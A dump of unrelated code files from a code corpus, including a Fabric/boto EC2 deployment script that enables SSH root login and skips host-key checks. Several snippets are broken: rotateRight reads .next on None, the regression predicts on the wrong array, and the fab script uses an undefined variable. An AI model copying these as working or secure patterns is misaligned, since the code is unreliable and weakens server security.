its 'x', 'y' and 'z'\n # attributes.\n atom_position = np.array(conf.GetAtomPosition(atom_id))\n\n # Inducing the shift.\n new_atom_position = atom_position + shift\n\n # Creating a new geometry instance.\n new_coords = rdkit_geo.Point3D(*new_atom_position)\n\n # Changes the position of the atom in the conformer to the\n # values stored in the new geometry instance.\n conf.SetAtomPosition(atom_id, new_coords)\n\n # Create a new copy of the rdkit molecule instance representing\n # the molecule - the original instance is not to be modified.\n new_mol = rdkit.Mol(self.mol)\n\n # The new rdkit molecule was copied from the one held in the\n # `mol` attribute, as result it has a copy of its conformer. To\n # prevent the rdkit molecule from holding multiple conformers\n # the `RemoveAllConformers` method is run first. The shifted\n # conformer is then given to the rdkit molecule, which is\n # returned.\n new_mol.RemoveAllConformers()\n new_mol.AddConformer(conf)\n return new_mol\n\n def update_cache(self):\n \"\"\"\n Update attributes of cached molecule.\n\n Using ``multiprocessing`` returns modified copies of molecules.\n In order to ensure that the cached molecules have\n their attributes updated to the values of the copies, this\n method must be run on the copies.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if self.key in self.__class__.cache:\n self.__class__.cache[self.key].__dict__ = dict(vars(self))\n\n def update_from_mae(self, path, conformer=-1):\n \"\"\"\n Updates molecular structure to match an ``.mae`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mae`` file from which the structure\n should be updated.\n\n conformer : :class:`int`, optional\n The conformer to be updated.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n mol = mol_from_mae_file(path)\n conf = rdkit.Conformer(mol.GetConformer())\n conf.SetId(conformer)\n self.mol.RemoveConformer(conformer)\n self.mol.AddConformer(conf)\n\n def update_from_mol(self, path, conformer=-1):\n \"\"\"\n Updates molecular structure to match an ``.mol`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mol`` file from which the structure\n should be updated.\n\n conformer : :class:`int`, optional\n The conformer to be updated.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n mol = remake(rdkit.MolFromMolFile(molFileName=path,\n sanitize=False,\n removeHs=False))\n conf = rdkit.Conformer(mol.GetConformer())\n conf.SetId(conformer)\n self.mol.RemoveConformer(conformer)\n self.mol.AddConformer(conf)\n\n def update_stereochemistry(self, conformer=-1):\n \"\"\"\n Updates stereochemistry tags in :attr:`Molecule.mol`.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n for atom in self.mol.GetAtoms():\n atom.UpdatePropertyCache()\n rdkit.AssignAtomChiralTagsFromStructure(self.mol, conformer)\n rdkit.AssignStereochemistry(self.mol, True, True, True)\n\n def write(self, path, conformer=-1):\n \"\"\"\n Writes a molecular structure file of the molecule.\n\n This bypasses the need to the writining functions in ``rdkit``.\n These have issues with macromolecules due to poor ring finding\n and sanitization issues.\n\n Parameters\n ----------\n path : :class:`str`\n The `path` to which the molecule should be written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n write_funcs = {\n '.mol': self._write_mdl_mol_file,\n '.sdf': self._write_mdl_mol_file,\n '.pdb': self._write_pdb_file,\n '.xyz': self._write_xyz_file\n }\n\n _, ext = os.path.splitext(path)\n write_func = write_funcs[ext]\n write_func(path, conformer)\n\n def _write_mdl_mol_file(self, path, conformer=-1):\n \"\"\"\n Writes a V3000 ``.mol`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n with open(path, 'w') as f:\n f.write(self.mdl_mol_block(conformer))\n\n def _write_pdb_file(self, path, conformer=-1):\n \"\"\"\n Writes a ``.pdb`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n # First write the file using rdkit.\n rdkit.MolToPDBFile(self.mol, path, conformer)\n\n # Edit the file because rkdit does poor atom labelling.\n new_content = ''\n with open(path, 'r') as pdb:\n for line in pdb:\n if 'HETATM' in line:\n words = line.split()\n lbl_word = words[2]\n rpl_word = words[-1]\n rpl_word += \" \"*(len(lbl_word)-len(rpl_word))\n line = line.replace(lbl_word, rpl_word)\n\n new_content += line\n\n with open(path, 'w') as pdb:\n pdb.write(new_content)\n\n def _write_xyz_file(self, path, conformer=-1):\n \"\"\"\n Writes a ``.xyz`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n x, y, z = self.position_matrix(conformer)\n number_atoms = str(len(x))\n\n with open(path, \"w\") as xyz:\n xyz.write(number_atoms)\n xyz.write(\"\\n\")\n xyz.write(\"\\n\")\n for i in range(len(x)):\n xyz.write('{} {:f} {:f} {:f}\\n'.format(\n self.atom_symbol(i), x[i], y[i], z[i]\n ))\n","sub_path":"stk/molecular/molecules/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":34091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"320186320","text":"from email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nimport smtplib\n\nfrom copernicus_tools.settings import *\n\n\nclass MailHandler:\n def __init__(self):\n self.user = ''\n self.password = ''\n self.msg = MIMEMultipart()\n self.text = MIMEText('')\n self.file_to_attach_path = ''\n self.image = None\n\n def send_admin_mail(self,\n mail_subject='',\n mail_text='',\n mail_from=admin_mail_from,\n mail_to=admin_mail_to,\n image_to_attach_path=None):\n self.msg = MIMEMultipart()\n self.msg['Subject'] = str(mail_subject)\n self.msg['From'] = str(mail_from)\n self.msg['To'] = str(mail_to)\n self.text = MIMEText(str(mail_text))\n self.msg.attach(self.text)\n self.user = email_user\n self.password = email_password\n\n if image_to_attach_path:\n try:\n f = open(image_to_attach_path, 'rb')\n self.image = MIMEImage(f.read())\n f.close()\n self.msg.attach(self.image)\n except IOError as e:\n logging.info(\n 'Could not send Admin Mail '\n '(From: {}, To: {}, Attached Image (if any): {}). '\n 'IOError: {}'.format(\n self.msg['From'], self.msg['To'],\n image_to_attach_path, str(e)))\n return\n\n try:\n smtp = smtplib.SMTP_SSL(email_host + ':' + email_port)\n smtp.login(self.user, self.password)\n smtp.sendmail(mail_from, mail_to, self.msg.as_string())\n smtp.quit()\n logging.debug(\n 'Admin Mail sent. '\n 'From: {}, To: {}, Attached Image (if any): {}'.format(\n self.msg['From'], self.msg['To'], image_to_attach_path))\n except smtplib.SMTPException as e:\n logging.info(\n 'Could not send Admin Mail '\n '(From: {}, To: {}, Attached Image (if any): {}). '\n 'SMTPException: {}'.format(\n self.msg['From'], self.msg['To'], image_to_attach_path,\n str(e)))\n return\n\n def send_product_selected_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product selected for download',\n mail_text='The following product has '\n 'been selected for download:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_product_downloaded_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product downloaded',\n mail_text='The following product has '\n 'been downloaded:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_product_processed_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product processed to Level 2A',\n mail_text='The following product has '\n 'been processed to Level 2A:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_preview_generated_mail(self, lab_product_instance):\n self.send_admin_mail(\n mail_subject='Preview generated',\n mail_text='Preview image generated for:\\n\\n' +\n lab_product_instance.title,\n image_to_attach_path=lab_product_instance.preview_image_path\n )\n","sub_path":"copernicus_tools/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"128533366","text":"\nfrom math import ceil\nn,h=[int(i)for i in input().split()]\nab=[[int(i) for i in input().split()] for j in range(n)]\nans=0\n\n\na=[ab[i][0] for i in range(n)]\nb=[ab[i][1] for i in range(n)]\na.sort()\nb.sort()\nwhile h>0 and len(b)>0 and b[-1]>a[-1]:\n\th-=b[-1]\n\tb.pop(-1)\n\tans+=1\nif h>0:\n\tans+=int(ceil(h/a[-1]))\nprint(ans)\n","sub_path":"atcoder/abc/080/abc085d.py","file_name":"abc085d.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449552122","text":"import pandas as pd\nfrom sklearn.linear_model import LinearRegression\n \ndf = pd.read_csv(r'F:\\Coursera courses\\IBM cognitive class\\Data Analysis with Python\\sampledata.csv')\nlm = LinearRegression()\ny = df[['horsepower', 'curb-weight', 'engine-size', 'highway-mpg']]\nx = df['price']\n\nlm.fit(y,x)\npred = lm.predict(x)\nprint(pred[0:5])\nprint(\"Intercept \" , lm.intercept_)\nprint(\"Slop \" , lm.coef_)","sub_path":"Model Development/MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169021847","text":"wrapping_paper = 0\r\nribbon = 0\r\nwith open(\"input2.txt\", \"r\") as textfile:\r\n\tfor line in textfile:\r\n\t\tnew_line = \"\"\r\n\t\tfor letter in line:\r\n\t\t\tif letter == 'x':\r\n\t\t\t\tnew_line += \" \"\r\n\t\t\telse:\r\n\t\t\t\tnew_line += letter\r\n\t\tl = int(new_line[:2])\r\n\t\tw = int(new_line[2:-3])\r\n\t\th = int(new_line[-3:])\r\n\t\twrapping_paper += 2 * l * w + 2 * w * h + 2 * l * h + min(l * w, w * h, h * l)\r\n\t\tribbon += 2 * min(l + w, l + h, w + h) + w * h * l\r\n\r\nprint(\"Answer for 2A:\", wrapping_paper)\r\nprint(\"Answer for 2B:\", ribbon)","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"333090","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\nimport sys\nimport boto.exception\nimport boto.ec2\nimport datetime\nimport time\nimport subprocess\n\nfrom fabric.api import (\n env,\n settings,\n sudo,\n prefix,\n put,\n cd,\n run,\n)\n\nfrom fabric.tasks import execute\n\nfrom fabric.contrib.files import (\n comment,\n uncomment,\n exists,\n append,\n sed\n)\n\nimport logging\n\nfrom copy_deploy_repo import copy_deploy_repo\n#based on https://github.com/ContinuumIO/wakari-deploy/blob/master/ami_creation/fabfile.py\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.DEBUG)\n# formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\n\n# log.addHandler(handler)\nlog.addHandler(console)\n\n# ami-65ce000e\n# ami-849e0c84\n# ami-1998e77c\n# ami-af5591eb\n# ami-9f92edfa\n# ami-1d4b1f78\n#AMI_ID = 'ami-1d4b1f78' #SSD in us-east-1\n#AMI_ID = 'ami-dfcab0b5' #SSD in us-east-1\n#AMI_ID = 'ami-dfcab0b5' #SSD in us-east-1\nAMI_ID = 'ami-6c276206' #SSD in us-east-1\n\nuse_latest_key = 'True' == os.environ.get('USE_LATEST_KEY', False)\n\nif 'xxx' == os.environ.get('AWS_ID', 'xxx').lower():\n print(\"you must pass a value for the environment variable AWS_ID\")\n quit()\nif 'xxx' == os.environ.get('AWS_SECRET', 'xxx').lower():\n print(\"you must pass a value for the environment variable AWS_SECRET\")\n quit()\nif 'xxx' == os.environ.get('PUF_FILE_PATH', 'xxx').lower():\n print(\"you must pass a value for the environment variable PUF_FILE_PATH\")\n quit()\nif 'xxx' == os.environ.get('SERVER_FILE_PATH', 'xxx').lower():\n print(\"you must pass a value for the environment variable SERVER_FILE_PATH\")\n quit()\n\nelse:\n PUF_FILE_PATH = os.path.abspath(os.path.expanduser(os.environ.get('PUF_FILE_PATH')))\n SERVER_FILE_PATH = os.path.abspath(os.path.expanduser(os.environ.get('SERVER_FILE_PATH')))\n if not os.path.exists(PUF_FILE_PATH):\n print(\"{} does not exist\".format(PUF_FILE_PATH))\n quit()\n\nenv.use_ssh_config = True\nenv.disable_known_hosts = True\nenv.connection_attempts = True\nenv.timeout = 300\n\nKEYNAME = \"{}-aei-dropq-{}\".format(AMI_ID,os.environ.get('USER', 'ospc'))\n#KEYNAME = \"keypair-ospc\"\n#SECURITY_GROUP = 'launch-wizard-26'\n#SECURITY_GROUP = 'dropq-security-group'\nSECURITY_GROUP = 'dropq-iam-group'\n\ndef create_box():\n old_ids = set(i.id for i in ec2.get_only_instances())\n machine = ec2.run_instances(AMI_ID, key_name=KEYNAME, min_count=2, max_count=2,\n security_groups=[SECURITY_GROUP,], instance_type=os.environ.get('EC2_INSTANCE_TYPE', 'm3.medium'))\n new_instances = [i for i in ec2.get_only_instances() if i.id not in old_ids]\n for new_instance in new_instances:\n print(new_instance.id)\n ec2.create_tags([new_instance.id], {\"billingProject\": \"aei\"})\n\n\n is_running = [False] * len(new_instances)\n while not all(is_running):\n for count, newinstance in enumerate(new_instances):\n is_running[count] = new_instance.state == u'running'\n time.sleep(3)\n for new_instance in new_instances:\n new_instance.update()\n\n\n is_reachable = [False] * len(new_instances)\n while not all(is_reachable):\n instance_ids=[new_instance.id for new_instance in new_instances]\n inst_statuses = ec2.get_all_instance_status(instance_ids=instance_ids)\n is_reachable = [inst_status.system_status.details['reachability'] != 'passed' for inst_status in inst_statuses]\n time.sleep(3)\n\n time.sleep(1)\n for new_instance in new_instances:\n assert new_instance.public_dns_name\n print(new_instance.public_dns_name)\n\n return new_instances\n\n\ndef create_keypair(source=KEYNAME):\n\n try:\n kp = ec2.delete_key_pair(source)\n except (boto.exception.EC2ResponseError):\n pass\n\n kp = ec2.create_key_pair(source)\n filename = os.environ.get('EC2_KEY_PATH', './keys/ec2-{}.pem'.format(datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')))\n latest_filename = os.environ.get('EC2_KEY_PATH', './latest.pem')\n kfile = open(filename, 'wb')\n latest_kfile = open(latest_filename, 'wb')\n def file_mode(user, group, other):\n return user*(8**2) + group*(8**1) + other*(8**0)\n kfile.write(kp.material)\n latest_kfile.write(kp.material)\n kfile.close()\n latest_kfile.close()\n os.chmod(filename, file_mode(7,0,0))\n os.chmod(latest_filename, file_mode(7,0,0))\n return filename\n\ndef test_all_ssh(instances, key_file):\n # needed to convert from unicode to ascii?\n key_file = str(key_file)\n ips = [str(instance.public_dns_name) for instance in instances]\n #env.host = 'ubuntu@e' + ip\n #env.host_string = ip\n #env.hosts = ['ubuntu@e' + ip for ip in ips]\n env.hosts = [ip for ip in ips]\n env.user = 'ubuntu'\n env.key_file = key_file\n env.key_filename = key_file\n\n print(env.hosts)\n\n # forward ssh agent -- equivalent of ssh -A\n env.forward_agent = True\n\n log.info('Key file: %s' % (key_file))\n log.debug('Trying to connect...')\n for h in env.hosts:\n env.host_string = h\n run('pwd')\n\ndef test_ssh2():\n run('pwd')\n\ndef test_ssh(instance, key_file):\n # needed to convert from unicode to ascii?\n key_file = str(key_file)\n ip = str(instance.public_dns_name)\n env.host = 'ubuntu@e' + ip\n env.host_string = ip\n env.hosts = [env.host]\n env.user = 'ubuntu'\n env.key_file = key_file\n env.key_filename = key_file\n\n # forward ssh agent -- equivalent of ssh -A\n env.forward_agent = True\n\n log.info('Key file: %s' % (key_file))\n log.debug('Trying to connect...')\n run('pwd')\n\ndef connect_to_existing_machine(ip, key_file_path):\n env.user = 'ubuntu'\n env.hosts = ['{}@{}'.format(env.user, ip)]\n env.host = '{}@{}'.format(env.user, ip)\n env.host_string = '{}@{}'.format(env.user, ip)\n env.key_file = key_file_path\n env.key_filename = key_file_path\n env.forward_agent = True\n log.info('Key file: %s' % (key_file_path))\n log.debug('Trying to connect...')\n run('pwd')\n\ndef fix_sshd_config():\n '''root needs an actual shell, so fix the sshd_config.'''\n config_file = '/etc/ssh/sshd_config'\n uncomment(config_file, r'^.*PermitRootLogin yes', use_sudo=True)\n comment(config_file, r'^PermitRootLogin forced-commands-only', use_sudo=True)\n\ndef apt_installs():\n log.info(\"installing packages with apt-get\")\n sudo(\"add-apt-repository -y ppa:saltstack/salt\")\n sudo(\"apt-get update -y\")\n packages = ['salt-master', 'salt-minion', 'salt-syndic', 'git', 'tig',\n 'silversearcher-ag', 'python-qt4']\n sudo(\"apt-get install -y {}\".format(' '.join(packages)))\n\n\ndef install_ogusa_repo():\n if 'XXX' not in os.environ.get('GITHUB_PRIVATE_KEY_PATH'):\n with settings(warn_only = True):\n run('ssh -T git@github.com -o StrictHostKeyChecking=no')\n url = 'git@github.com:open-source-economics/OG-USA'\n else:\n url = 'https://{USERNAME}@github.com/open-source-economics/OG-USA'.format(\n USERNAME = os.environ.get('GITHUB_USERNAME'))\n\n sudo('rm -rf ~/OG-USA')\n if os.environ.get('GIT_BRANCH'):\n run(\"git clone {} --branch {}\".format(url, os.environ.get('OGUSA_GIT_BRANCH')))\n else:\n run(\"git clone {}\".format(url))\n\n\n\ndef copy_puf_file():\n put(PUF_FILE_PATH, \"/home/ubuntu/deploy/puf.csv.gz\")\n put(SERVER_FILE_PATH, \"/home/ubuntu/reset_server.sh\")\n\ndef extract_puf_file():\n run(\"cd /home/ubuntu/deploy/; gunzip -k puf.csv.gz\")\n\ndef convenience_aliases():\n run('echo \"alias supervisorctl=\\'supervisorctl -c /home/ubuntu/deploy/fab/supervisord.conf\\'\" >> ~/.bashrc')\n run('echo \"alias ss=\\'sudo /usr/bin/salt-call state.highstate --retcode-passthrough --log-level=debug --config-dir=/home/ubuntu/deploy/fab/salt\\'\" >> ~/.bashrc')\n\n\ndef run_salt():\n run(\"ln -s ~/deploy/salt ~/salt\")\n sudo('sudo /usr/bin/salt-call state.highstate --retcode-passthrough --log-level=debug --config-dir=\"$HOME/deploy/salt\"')\n\ndef reset_server():\n run(\"source /home/ubuntu/reset_server.sh\")\n\n\nkey_filename = './latest.pem'\n#instances = ['ip1', 'ip2']\nkey_file = str(key_filename)\nips = instances\nenv.hosts = [ip for ip in ips]\nenv.user = 'ubuntu'\nenv.key_file = key_file\nenv.key_filename = key_file\n# forward ssh agent -- equivalent of ssh -A\nenv.forward_agent = True\n\nprint(env.hosts)\nprint(ips)\n#execute(test_ssh2)\n#execute(apt_installs)\n#execute(install_ogusa_repo)\n#execute(convenience_aliases)\n#execute(copy_puf_file)\n#execute(extract_puf_file)\nexecute(run_salt)\nexecute(reset_server)\n\nfor instance in instances:\n ssh_command = 'ssh -i {key} ubuntu@{ip} \"'.format(ip=instance, key=key_filename)\n with open(\"log_{}.log\".format(instance), 'w') as f:\n f.write(ssh_command)\n print(ssh_command)\n","sub_path":"deploy/fab/fab_exec.py","file_name":"fab_exec.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"221093984","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n# from __future__ import unicode_literals\n\nimport importlib\nimport pprint\n\nfrom onnx import defs\n\nfrom onnx_tf.common import (op_name_to_lower, ONNX_OP_TO_TF_OP,\n ONNX_OP_TO_TF_OP_STR)\n\n\ndef main():\n backend_opset_dict = {}\n frontend_opset_dict = {}\n frontend_tf_opset_dict = {}\n\n for schema in defs.get_all_schemas():\n op_name = schema.name\n backend_opset_dict[op_name] = []\n frontend_opset_dict[op_name] = []\n\n version = 1\n while True:\n try:\n backend = (importlib.import_module('backends.backend_v{}'.format(version))\n .TensorflowBackend)\n frontend = (importlib.import_module('frontends.frontend_v{}'\n .format(version)).TensorflowFrontend)\n except:\n break\n\n # Register all tf ops in ONNX_TO_HANDLER\n tf_op_names = []\n onnx_to_handler = frontend.ONNX_TO_HANDLER.get(\n 'frontend_v{}'.format(version), {})\n # for handler in frontend.ONNX_TO_HANDLER.values():\n for handler in onnx_to_handler.values():\n if isinstance(handler, list):\n tf_op_names.extend(list(map(op_name_to_lower, handler)))\n else:\n tf_op_names.append(op_name_to_lower(handler))\n\n for schema in defs.get_all_schemas():\n op_name = schema.name\n lower_op_name = op_name_to_lower(op_name)\n has_backend_handler = hasattr(backend, 'handle_' + lower_op_name)\n # Record only one version for trivial ops\n if has_backend_handler or (version == 1 and\n lower_op_name in ONNX_OP_TO_TF_OP.keys()):\n backend_opset_dict[op_name].append(version)\n\n # Register once if onnx op in ONNX_OP_TO_TF_OP_STR\n if version == 1 and schema.name in ONNX_OP_TO_TF_OP_STR and \\\n ONNX_OP_TO_TF_OP_STR[schema.name] not in tf_op_names:\n tf_op_names.append(op_name_to_lower(ONNX_OP_TO_TF_OP_STR[schema.name]))\n frontend_opset_dict[op_name].append(version)\n # Register if onnx op in ONNX_TO_HANDLER\n elif op_name in onnx_to_handler:\n frontend_opset_dict[op_name].append(version)\n for tf_op_name in tf_op_names:\n frontend_tf_opset_dict.setdefault(str(tf_op_name), []).append(version)\n\n version += 1\n\n with open('opset_version.py', 'w') as version_file:\n pp = pprint.PrettyPrinter(indent=4)\n version_file.write(\"backend_opset_version = {\\n \" +\n pp.pformat(backend_opset_dict)[1:-1] + \"\\n}\\n\\n\")\n version_file.write(\"frontend_opset_version = {\\n \" +\n pp.pformat(frontend_opset_dict)[1:-1] + \"\\n}\\n\\n\")\n version_file.write(\"frontend_tf_opset_version = {\\n \" +\n pp.pformat(frontend_tf_opset_dict)[1:-1] + \"\\n}\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"onnx_tf/gen_opset.py","file_name":"gen_opset.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"422329641","text":"import os \nif os.environ['ENV'] == \"dev\":\n import pi.MockGpio as GPIO\nelse:\n import RPi.GPIO as GPIO\n\nimport time\nimport pi.IngredientService as IngredientService\nimport pi.MenuService as MenuService\n\n\n# get mapping of pump numbers to pins\npumpToPin = {\n 0:36\n ,1:22\n ,2:18\n ,3:11\n ,4:13\n ,5:15\n}\n\n# get the reverse mapping\npinToPump = {}\nfor pump,pin in pumpToPin.items():\n pinToPump[pin] = pump\n\n# initialize pins on board\nGPIO.setmode(GPIO.BOARD)\nfor pin in pinToPump:\n GPIO.setup(pin, GPIO.OUT, initial=GPIO.HIGH)\n\n\n# amount in ml\ndef pourFromPump(pumpNumber, amount):\n global pumpToPin\n if pumpNumber not in pumpToPin:\n print(\"tried to pour a liquid from a pump thats not in the pin map\")\n print(pumpNumber)\n print(type(pumpNumber))\n return\n\n pinNumber = pumpToPin[pumpNumber]\n duration = amount / IngredientService.pumpRate[pumpNumber]\n print(\"Pin ON %d\" % pinNumber)\n GPIO.output(pinNumber,False)\n time.sleep(duration)\n GPIO.output(pinNumber,True)\n print(\"Pin OFF %d\" % pinNumber)\n\n\n\ndef pourDrink(drinkGuid, menuFilePath=MenuService.defaultMenufilePath, ingredientfilePath=IngredientService.defaultIngredientfilePath, pumMapfilePath=IngredientService.defaultPumpMapfilePath):\n if not MenuService.isValidDrinkToPour(drinkGuid, menuFilePath=menuFilePath, ingredientfilePath=ingredientfilePath, pumMapfilePath=pumMapfilePath):\n print(\"Skipping drink to pour due to invalid drink enty\")\n return\n\n menu = MenuService.getMenu()\n drink = menu[drinkGuid]\n pumpMap = IngredientService.getPumpMap()\n\n for ing,amount in drink[\"ings\"].items():\n pumpNum = pumpMap[ing]\n pourFromPump(pumpNum, amount)\n\n","sub_path":"pi/PouringService.py","file_name":"PouringService.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148864189","text":"from platform import python_version\nfrom os.path import expanduser\n\nname = \"likide\"\nversion = \"0.0.3\"\npy_version = python_version()\nauthor = \"BIPBIPGaminG & Tudiiii\"\nlang = \"fr_FR\"\nfont_size = \"20\"\nfont_family = \"Segoe\\ UI\\ Light\"\ndir_var = {'DISK': \"C\", 'USER_HOME': expanduser(\"~\")}\ncurrent_project_dir = '{USER_HOME}\\\\Documents\\\\Likide\\\\FirstProject\\\\'.format(**dir_var)\ncurrent_file_name = \"../main.py\"\n\n\nbackground_color = \"#4f4f4f\"\nforeground_color = \"#eaeaea\"\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59864305","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AlternativeNames',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='name')),\n ('lang', models.CharField(max_length=5, verbose_name='language')),\n ],\n options={\n 'verbose_name_plural': 'alternative names',\n },\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='country name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'countries',\n },\n ),\n migrations.CreateModel(\n name='Place',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='place name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ('country', models.ForeignKey(to='regions.Country')),\n ],\n options={\n 'verbose_name_plural': 'places',\n },\n ),\n migrations.CreateModel(\n name='Region',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256, verbose_name='region name')),\n ('alt_names', models.ManyToManyField(to='regions.AlternativeNames', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'regions',\n },\n ),\n migrations.AddField(\n model_name='place',\n name='region',\n field=models.ForeignKey(to='regions.Region'),\n ),\n migrations.AddField(\n model_name='country',\n name='region',\n field=models.ForeignKey(to='regions.Region'),\n ),\n ]\n","sub_path":"apps/regions/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"135587915","text":"\"\"\"\nGiven a list, rotate the list to the right by k places, where k is non-negative.\n\nFor example:\nGiven 1->2->3->4->5->NULL and k = 2,\nreturn 4->5->1->2->3->NULL.\n\"\"\"\n\n\nclass Solution(object):\n def rotateRight(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if not head: return\n\n n, last = self.get_length_and_last_node(head)\n k %= n\n if k == 0: return head\n prev = None\n for i in range(n - k - 1):\n prev = prev.next\n\n new_head = prev.next\n prev.next = None\n last.next = head\n return new_head\n\n def get_length_and_last_node(self, head):\n length = 0\n last = None\n while head:\n last = head\n head = head.next\n length += 1\n return length, last\n","sub_path":"medium/RotateList.py","file_name":"RotateList.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"62617684","text":"\"\"\"\n@author: Zsofia Koma, UvA\nAim: calculate vegetation related features using laserchicken within a cell\n\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport time\n\nimport laspy\nfrom laspy.file import File\n\nimport numpy as np\n\n#sys.path.insert(0, \"D:/GitHub/eEcoLiDAR/develop-branch/eEcoLiDAR/\")\nsys.path.insert(0, \"D:/Koma/GitHub/eEcoLiDAR/\")\n\nfrom laserchicken import read_las\nfrom laserchicken.keys import point\nfrom laserchicken.volume_specification import Cell,InfiniteCylinder\nfrom laserchicken.compute_neighbors import compute_neighborhoods\nfrom laserchicken.feature_extractor import compute_features\nfrom laserchicken.write_ply import write\n\n# global variables\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input', help='absolute path of input point cloud (las file)')\nargs = parser.parse_args()\n\nfilename=args.input\nresolution=1\n\n# Create target point cloud\n\nstart1 = time.time()\n# read las file\n\nin_pc = File(filename+\".las\", mode='r')\nin_pc_nparray = np.vstack([in_pc.x, in_pc.y, in_pc.z]).transpose()\n\nprint((\"Number of points are: %s\") % (in_pc_nparray.shape[0]))\n\n# generate grid in 2D z==0 (for 2.5D analysis within 